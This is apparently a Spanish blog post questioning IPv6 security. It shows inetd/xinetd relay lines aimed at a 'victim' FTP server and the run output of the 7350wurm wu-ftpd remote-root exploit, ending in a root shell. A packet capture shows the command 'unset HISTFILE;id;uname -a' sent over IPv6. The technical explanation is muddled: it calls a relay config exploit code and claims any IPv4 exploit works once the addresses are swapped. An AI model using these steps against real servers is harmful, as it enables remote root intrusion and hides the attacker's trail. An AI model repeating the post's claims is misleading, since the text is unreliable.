Empiezo este artículo con ese interrogante: “IPv6. ¿Es realmente seguro?”, y la respuesta a esta pregunta es más fácil de lo que piensan algunos: “IPv6 hereda la gran mayoría de los problemas de IPv4, sólo que aún están empezando a aparecer”.

En IPv6 podemos ejecutar un exploit de IPv4, lo único que debemos hacer es cambiar las direcciones tipo IPv4 (192.168.1.1) por direcciones IPv6 (2001:db8:100::10/64) en el código fuente del exploit y listo; cabe recordar que las direcciones publicadas son direcciones de ejemplo.

 

Ejemplo de un exploit para atacar un servidor FTP:

inetd.conf
ftp stream tcp nowait root /usr/local//bin/nc /usr/local/bin/nc6 victima.ip ftp
xinetd
service ftp
{
socket_type = stream
wait = no
user = root
server = /usr/bin/nc6
server_args = victim IPv6_addr ftp
log_on_success+= DURATION USERID
log_on_failure += USERID
nice = 10 }

El fragmento de código anterior es parte de un exploit para atacar un servidor FTP, el cual después de ejecutarlo de la siguiente manera:

./wu -a -v vax.pruebas.org
7350wurm – x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy
….
### TARGET: RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
##################
uid=0(root) gid=0(root) groups=50(ftp)
Linux grima 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
ls -al /
total 164
drwxr-xr-x 19 root root 4096 Jul 5 20:15 .
drwxr-xr-x 19 root root 4096 Jul 5 20:15 ..
-rw-r–r– 1 root root 0 Jul 5 09:54 .autofsck

Nos muestra el siguiente resultado:

21:15:26.534722 2001:720:6969:666::38.34073 > 2001:720:40:2cff::247.ftp: P 1449:1477(28) ack 4320 win 33075
0x0000 6000 0000 0030 063b 2001 0720 1710 0f00 `….0.;……..
0x0010 0000 0000 0000 0038 2001 0800 0040 2cff …….8…..@,.
0x0020 0000 0000 0000 0247 8519 0015 2969 aafe …….G….)i..
0x0030 3ed1 3062 5018 8133 f196 0000 756e 7365 >.0bP..3….unse
0x0040 7420 4849 5354 4649 4c45 3b69 643b 756e t.HISTFILE;id;un
0x0050 616d 6520 2d61 3b0a ame.-a;.
21:15:26.584722 2001:720:40:2cff::247.ftp > 2001:720:6969:666::38.34073: P 4359:4424(65) ack 1477 win 6432
0x0000 6000 0000 0055 0640 2001 0800 0040 2cff `….U.@…..@,.
0x0010 0000 0000 0000 0247 2001 0720 1710 0f00 …….G……..
0x0020 0000 0000 0000 0038 0015 8519 3ed1 3089 …….8….>.0.
0x0030 2969 ab1a 5018 1920 0522 0000 4c69 6e75 )i..P….”..Linu
0x0040 7820 6772 696d 6120 322e 342e 372d 3130 x.grima.2.4.7-10
0x0050 2023 3120 5468 7520 5365 7020 3620 3136 .#1.Thu.Sep.6.16
0x0060 3a34 363a 3336 2045 4454 2032 3030 3120 :46:36.EDT.2001.
0x0070 6936 3836 2075 6e6b 6e6f 776e 0a i686.unknown.
21:15:35.044722 2001:720:6969:666::38.34073 > 2001:720:40:2cff::247.ftp: P 1477:1486(9) ack 4424 win 33043
0x0000 6000 0000 001d 063b 2001 0720 1710 0f00 `……;……..
0x0010 0000 0000 0000 0038 2001 0800 0040 2cff …….8…..@,.

En conclusión, pensarían que IPv6 es mucho más seguro que IPv4? Les dejo de tarea ese interrogante.

Napster

Anuncios